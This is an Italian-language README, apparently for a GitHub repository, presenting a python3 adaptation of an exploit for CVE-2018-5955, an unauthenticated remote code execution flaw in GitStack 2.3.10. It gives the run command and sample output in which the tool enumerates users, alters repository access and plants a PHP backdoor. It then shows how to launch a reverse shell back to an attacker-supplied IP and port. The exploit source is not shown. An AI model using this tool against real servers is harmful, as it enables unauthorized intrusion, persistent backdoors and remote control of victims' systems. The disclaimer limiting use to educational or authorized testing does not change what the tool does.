
Un exploit per CVE-2018-5955 GitStack 2.3.10 RCE non autenticato
Un exploit per CVE-2018-5955 GitStack 2.3.10 RCE non autenticata
Exploit: GitStack 2.3.10 Esecuzione di codice in remoto non autenticata
Data: 18.01.2018
Link del software: https://gitstack.com/
Autore dell'exploit: Kacper Szurek
Exploit originale: https://www.exploit-db.com/exploits/43777
Sito web: https://security.szurek.pl/
Categoria: remoto
CVE: CVE-2018-5955
Data: 23.06.2023
Nuove funzionalità: RCE interattivo, Rilevamento OS, funzione Reverse Shell, adattato da python2 a python3
CVE: CVE-2018-5955
Categoria: remoto
Non mi assumo alcuna responsabilità per le tue azioni, poiché l'ho pubblicato su GitHub per scopi educativi o per test di penetrazione certificati e autorizzati.
Installa i requisiti:
pip install colorama
Poi puoi eseguirlo con:
python3 exploit.py
Il sistema operativo verrà rilevato dopo aver sfruttato la CVE, infatti apparirà questa riga di output: "[*] OS: $operatingsystem" (Dimostrazione sotto)
[+] Ottieni elenco utenti
[+] Trovato utente twreath
[+] Repository web già abilitato
[+] Ottieni elenco repository
[+] Trovato repository Website
[+] Aggiungi utente al repository
[+] Disabilita accesso per chiunque
[+] Crea backdoor in PHP
[*] Digita 'shell' per ottenere una reverse shell
[*] OS : Windows <----
Puoi anche digitare "os" per scoprire che tipo di sistema operativo è
Per ottenere una vera reverse shell sul target, puoi digitare "shell" e poi inserire il tuo IP e la porta di ascolto in questo modo:
RCE > shell
[?] Inserisci l'indirizzo IP per la shell: IL TUO IP QUI
[?] Inserisci il numero di porta per la shell: LA TUA PORTA DI ASCOLTO QUI